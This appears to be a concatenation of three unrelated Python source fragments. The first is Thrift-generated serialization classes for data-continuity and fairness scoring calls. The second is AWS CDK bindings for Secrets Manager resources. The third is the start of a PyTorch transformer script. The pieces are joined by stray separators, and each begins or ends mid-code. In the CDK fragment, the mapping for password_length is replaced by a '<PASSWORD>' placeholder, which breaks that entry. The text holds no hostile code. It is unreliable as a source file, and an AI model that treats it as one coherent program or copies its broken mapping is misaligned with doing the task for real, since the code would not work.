self.historical_missionMeasurements.append(_elem353)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateDataContinuityScore_args')
if self.missionMeasurements is not None:
oprot.writeFieldBegin('missionMeasurements', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.missionMeasurements))
for iter354 in self.missionMeasurements:
iter354.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.historical_missionMeasurements is not None:
oprot.writeFieldBegin('historical_missionMeasurements', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.historical_missionMeasurements))
for iter355 in self.historical_missionMeasurements:
iter355.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateDataContinuityScore_args)
evaluateDataContinuityScore_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 1
(2, TType.LIST, 'historical_missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 2
)
class evaluateDataContinuityScore_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.DOUBLE:
self.success = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateDataContinuityScore_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.DOUBLE, 0)
oprot.writeDouble(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateDataContinuityScore_result)
evaluateDataContinuityScore_result.thrift_spec = (
(0, TType.DOUBLE, 'success', None, None, ), # 0
)
class evaluateFairnessScore_args(object):
"""
Attributes:
- missionMeasurements
"""
def __init__(self, missionMeasurements=None,):
self.missionMeasurements = missionMeasurements
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.missionMeasurements = []
(_etype359, _size356) = iprot.readListBegin()
for _i360 in range(_size356):
_elem361 = MissionMeasurements()
_elem361.read(iprot)
self.missionMeasurements.append(_elem361)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('evaluateFairnessScore_args')
if self.missionMeasurements is not None:
oprot.writeFieldBegin('missionMeasurements', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.missionMeasurements))
for iter362 in self.missionMeasurements:
iter362.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(evaluateFairnessScore_args)
evaluateFairnessScore_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'missionMeasurements', (TType.STRUCT, [MissionMeasurements, None], False), None, ), # 1
)
class evaluateFairnessScore_result(object):
"""
Attributes:
- | |
typing.cast(typing.Optional[builtins.str], jsii.get(self, "name"))
@name.setter
def name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="replicaRegions")
def replica_regions(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]]:
'''``AWS::SecretsManager::Secret.ReplicaRegions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-replicaregions
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]], jsii.get(self, "replicaRegions"))
@replica_regions.setter
def replica_regions(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnSecret.ReplicaRegionProperty"]]]],
) -> None:
jsii.set(self, "replicaRegions", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="secretString")
def secret_string(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.SecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-secretstring
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "secretString"))
@secret_string.setter
def secret_string(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "secretString", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecret.GenerateSecretStringProperty",
jsii_struct_bases=[],
name_mapping={
"exclude_characters": "excludeCharacters",
"exclude_lowercase": "excludeLowercase",
"exclude_numbers": "excludeNumbers",
"exclude_punctuation": "excludePunctuation",
"exclude_uppercase": "excludeUppercase",
"generate_string_key": "generateStringKey",
"include_space": "includeSpace",
"password_length": "<PASSWORD>",
"require_each_included_type": "requireEachIncludedType",
"secret_string_template": "secretStringTemplate",
},
)
class GenerateSecretStringProperty:
def __init__(
self,
*,
exclude_characters: typing.Optional[builtins.str] = None,
exclude_lowercase: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_numbers: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_punctuation: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
exclude_uppercase: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
generate_string_key: typing.Optional[builtins.str] = None,
include_space: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
password_length: typing.Optional[jsii.Number] = None,
require_each_included_type: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
secret_string_template: typing.Optional[builtins.str] = None,
) -> None:
'''
:param exclude_characters: ``CfnSecret.GenerateSecretStringProperty.ExcludeCharacters``.
:param exclude_lowercase: ``CfnSecret.GenerateSecretStringProperty.ExcludeLowercase``.
:param exclude_numbers: ``CfnSecret.GenerateSecretStringProperty.ExcludeNumbers``.
:param exclude_punctuation: ``CfnSecret.GenerateSecretStringProperty.ExcludePunctuation``.
:param exclude_uppercase: ``CfnSecret.GenerateSecretStringProperty.ExcludeUppercase``.
:param generate_string_key: ``CfnSecret.GenerateSecretStringProperty.GenerateStringKey``.
:param include_space: ``CfnSecret.GenerateSecretStringProperty.IncludeSpace``.
:param password_length: ``CfnSecret.GenerateSecretStringProperty.PasswordLength``.
:param require_each_included_type: ``CfnSecret.GenerateSecretStringProperty.RequireEachIncludedType``.
:param secret_string_template: ``CfnSecret.GenerateSecretStringProperty.SecretStringTemplate``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if exclude_characters is not None:
self._values["exclude_characters"] = exclude_characters
if exclude_lowercase is not None:
self._values["exclude_lowercase"] = exclude_lowercase
if exclude_numbers is not None:
self._values["exclude_numbers"] = exclude_numbers
if exclude_punctuation is not None:
self._values["exclude_punctuation"] = exclude_punctuation
if exclude_uppercase is not None:
self._values["exclude_uppercase"] = exclude_uppercase
if generate_string_key is not None:
self._values["generate_string_key"] = generate_string_key
if include_space is not None:
self._values["include_space"] = include_space
if password_length is not None:
self._values["password_length"] = password_length
if require_each_included_type is not None:
self._values["require_each_included_type"] = require_each_included_type
if secret_string_template is not None:
self._values["secret_string_template"] = secret_string_template
@builtins.property
def exclude_characters(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeCharacters``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludecharacters
'''
result = self._values.get("exclude_characters")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def exclude_lowercase(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeLowercase``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludelowercase
'''
result = self._values.get("exclude_lowercase")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_numbers(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeNumbers``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludenumbers
'''
result = self._values.get("exclude_numbers")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_punctuation(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludePunctuation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludepunctuation
'''
result = self._values.get("exclude_punctuation")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def exclude_uppercase(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.ExcludeUppercase``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-excludeuppercase
'''
result = self._values.get("exclude_uppercase")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def generate_string_key(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.GenerateStringKey``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-generatestringkey
'''
result = self._values.get("generate_string_key")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def include_space(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.IncludeSpace``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-includespace
'''
result = self._values.get("include_space")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def password_length(self) -> typing.Optional[jsii.Number]:
'''``CfnSecret.GenerateSecretStringProperty.PasswordLength``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-passwordlength
'''
result = self._values.get("password_length")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def require_each_included_type(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnSecret.GenerateSecretStringProperty.RequireEachIncludedType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-requireeachincludedtype
'''
result = self._values.get("require_each_included_type")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def secret_string_template(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.GenerateSecretStringProperty.SecretStringTemplate``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-generatesecretstring.html#cfn-secretsmanager-secret-generatesecretstring-secretstringtemplate
'''
result = self._values.get("secret_string_template")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GenerateSecretStringProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecret.ReplicaRegionProperty",
jsii_struct_bases=[],
name_mapping={"region": "region", "kms_key_id": "kmsKeyId"},
)
class ReplicaRegionProperty:
def __init__(
self,
*,
region: builtins.str,
kms_key_id: typing.Optional[builtins.str] = None,
) -> None:
'''
:param region: ``CfnSecret.ReplicaRegionProperty.Region``.
:param kms_key_id: ``CfnSecret.ReplicaRegionProperty.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html
'''
self._values: typing.Dict[str, typing.Any] = {
"region": region,
}
if kms_key_id is not None:
self._values["kms_key_id"] = kms_key_id
@builtins.property
def region(self) -> builtins.str:
'''``CfnSecret.ReplicaRegionProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html#cfn-secretsmanager-secret-replicaregion-region
'''
result = self._values.get("region")
assert result is not None, "Required property 'region' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def kms_key_id(self) -> typing.Optional[builtins.str]:
'''``CfnSecret.ReplicaRegionProperty.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-secretsmanager-secret-replicaregion.html#cfn-secretsmanager-secret-replicaregion-kmskeyid
'''
result = self._values.get("kms_key_id")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ReplicaRegionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretProps",
jsii_struct_bases=[],
name_mapping={
"description": "description",
"generate_secret_string": "generateSecretString",
"kms_key_id": "kmsKeyId",
"name": "name",
"replica_regions": "replicaRegions",
"secret_string": "secretString",
"tags": "tags",
},
)
class CfnSecretProps:
def __init__(
self,
*,
description: typing.Optional[builtins.str] = None,
generate_secret_string: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]] = None,
kms_key_id: typing.Optional[builtins.str] = None,
name: typing.Optional[builtins.str] = None,
replica_regions: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]] = None,
secret_string: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Sequence[aws_cdk.core.CfnTag]] = None,
) -> None:
'''Properties for defining a ``AWS::SecretsManager::Secret``.
:param description: ``AWS::SecretsManager::Secret.Description``.
:param generate_secret_string: ``AWS::SecretsManager::Secret.GenerateSecretString``.
:param kms_key_id: ``AWS::SecretsManager::Secret.KmsKeyId``.
:param name: ``AWS::SecretsManager::Secret.Name``.
:param replica_regions: ``AWS::SecretsManager::Secret.ReplicaRegions``.
:param secret_string: ``AWS::SecretsManager::Secret.SecretString``.
:param tags: ``AWS::SecretsManager::Secret.Tags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if description is not None:
self._values["description"] = description
if generate_secret_string is not None:
self._values["generate_secret_string"] = generate_secret_string
if kms_key_id is not None:
self._values["kms_key_id"] = kms_key_id
if name is not None:
self._values["name"] = name
if replica_regions is not None:
self._values["replica_regions"] = replica_regions
if secret_string is not None:
self._values["secret_string"] = secret_string
if tags is not None:
self._values["tags"] = tags
@builtins.property
def description(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.Description``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-description
'''
result = self._values.get("description")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def generate_secret_string(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]]:
'''``AWS::SecretsManager::Secret.GenerateSecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-generatesecretstring
'''
result = self._values.get("generate_secret_string")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnSecret.GenerateSecretStringProperty]], result)
@builtins.property
def kms_key_id(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.KmsKeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-kmskeyid
'''
result = self._values.get("kms_key_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def name(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-name
'''
result = self._values.get("name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def replica_regions(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]]:
'''``AWS::SecretsManager::Secret.ReplicaRegions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-replicaregions
'''
result = self._values.get("replica_regions")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnSecret.ReplicaRegionProperty]]]], result)
@builtins.property
def secret_string(self) -> typing.Optional[builtins.str]:
'''``AWS::SecretsManager::Secret.SecretString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-secretstring
'''
result = self._values.get("secret_string")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
'''``AWS::SecretsManager::Secret.Tags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secret.html#cfn-secretsmanager-secret-tags
'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.List[aws_cdk.core.CfnTag]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnSecretProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnSecretTargetAttachment(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretTargetAttachment",
):
'''A CloudFormation ``AWS::SecretsManager::SecretTargetAttachment``.
:cloudformationResource: AWS::SecretsManager::SecretTargetAttachment
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
secret_id: builtins.str,
target_id: builtins.str,
target_type: builtins.str,
) -> None:
'''Create a new ``AWS::SecretsManager::SecretTargetAttachment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param secret_id: ``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:param target_id: ``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:param target_type: ``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
'''
props = CfnSecretTargetAttachmentProps(
secret_id=secret_id, target_id=target_id, target_type=target_type
)
jsii.create(CfnSecretTargetAttachment, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="secretId")
def secret_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-secretid
'''
return typing.cast(builtins.str, jsii.get(self, "secretId"))
@secret_id.setter
def secret_id(self, value: builtins.str) -> None:
jsii.set(self, "secretId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="targetId")
def target_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targetid
'''
return typing.cast(builtins.str, jsii.get(self, "targetId"))
@target_id.setter
def target_id(self, value: builtins.str) -> None:
jsii.set(self, "targetId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="targetType")
def target_type(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targettype
'''
return typing.cast(builtins.str, jsii.get(self, "targetType"))
@target_type.setter
def target_type(self, value: builtins.str) -> None:
jsii.set(self, "targetType", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-secretsmanager.CfnSecretTargetAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"secret_id": "secretId",
"target_id": "targetId",
"target_type": "targetType",
},
)
class CfnSecretTargetAttachmentProps:
def __init__(
self,
*,
secret_id: builtins.str,
target_id: builtins.str,
target_type: builtins.str,
) -> None:
'''Properties for defining a ``AWS::SecretsManager::SecretTargetAttachment``.
:param secret_id: ``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:param target_id: ``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:param target_type: ``AWS::SecretsManager::SecretTargetAttachment.TargetType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html
'''
self._values: typing.Dict[str, typing.Any] = {
"secret_id": secret_id,
"target_id": target_id,
"target_type": target_type,
}
@builtins.property
def secret_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.SecretId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-secretid
'''
result = self._values.get("secret_id")
assert result is not None, "Required property 'secret_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def target_id(self) -> builtins.str:
'''``AWS::SecretsManager::SecretTargetAttachment.TargetId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-secretsmanager-secrettargetattachment.html#cfn-secretsmanager-secrettargetattachment-targetid
'''
result = self._values.get("target_id")
assert result is not None, "Required property 'target_id' is missing"
return typing.cast(builtins.str, result)
| |
<filename>BAN_main.py
# -*- coding: utf-8 -*-
"""EN3-BT MCD
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1cnvSgNDexJ0cqrTWGygI_smZ0y8EIWZn
"""
import torch
import numpy as np
import tqdm
import copy
from torch.nn import functional as F
from torch.nn.modules.module import Module
from sklearn.calibration import calibration_curve, CalibratedClassifierCV
from torch.nn.modules.activation import MultiheadAttention
from torch.nn.modules.container import ModuleList
from torch.nn.init import xavier_uniform_
from torch.nn.modules.dropout import Dropout
from torch.nn.modules.linear import Linear
from torch.nn.modules.normalization import LayerNorm
from torch.utils.data import DataLoader, Dataset
import logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
logging.getLogger().setLevel(logging.INFO)
from utils import *
import math
from torch.autograd import Variable
import re
import pandas as pd
torch.manual_seed(2)
def set_dropout_to_train(m):
if type(m) == torch.nn.Dropout:
m.train()
class Embedder(Module):
def __init__(self, vocab_size, d_model):
super().__init__()
self.d_model = d_model
print(vocab_size, d_model)
self.embed = torch.nn.Embedding(vocab_size + 1, d_model)
def forward(self, x):
x = self.embed(x)
return x
class PositionalEncoder(Module):
def __init__(self, d_model, max_seq_len = 768, dropout = 0.5):
super().__init__()
self.d_model = d_model
self.dropout = Dropout(dropout)
# create constant 'pe' matrix with values dependant on
# pos and i
pe = torch.zeros(max_seq_len, d_model)
for pos in range(max_seq_len):
for i in range(0, d_model, 2):
pe[pos, i] = \
math.sin(pos / (10000 ** ((2 * i)/d_model)))
pe[pos, i + 1] = \
math.cos(pos / (10000 ** ((2 * (i + 1))/d_model)))
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
# make embeddings relatively larger
x = x * math.sqrt(self.d_model)
#add constant to embedding
seq_len = x.size(1)
pe = Variable(self.pe[:,:seq_len], requires_grad=False)
if x.is_cuda:
pe.cuda()
x = x + pe
return self.dropout(x)
def get_clones(module, N):
return torch.nn.ModuleList([copy.deepcopy(module) for i in range(N)])
def attention(q, k, v, d_k, mask=None, dropout=None):
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)
scores = F.softmax(scores, dim=-1)
if dropout is not None:
scores = dropout(scores)
output = torch.matmul(scores, v)
return output
class MultiHeadAttention(Module):
def __init__(self, heads, d_model, dropout = 0.5):
super().__init__()
self.d_model = d_model
self.d_k = d_model // heads
self.h = heads
self.q_linear = torch.nn.Linear(d_model, d_model)
self.v_linear = torch.nn.Linear(d_model, d_model)
self.k_linear = torch.nn.Linear(d_model, d_model)
self.dropout = Dropout(dropout)
self.out = torch.nn.Linear(d_model, d_model)
def forward(self, q, k, v, mask=None):
bs = q.size(0)
# perform linear operation and split into h heads
k = self.k_linear(k).view(bs, -1, self.h, self.d_k)
q = self.q_linear(q).view(bs, -1, self.h, self.d_k)
v = self.v_linear(v).view(bs, -1, self.h, self.d_k)
# transpose to get dimensions bs * h * sl * d_model
k = k.transpose(1,2)
q = q.transpose(1,2)
v = v.transpose(1,2)
# calculate attention using function we will define next
scores = attention(q, k, v, self.d_k, mask, self.dropout)
# concatenate heads and put through final linear layer
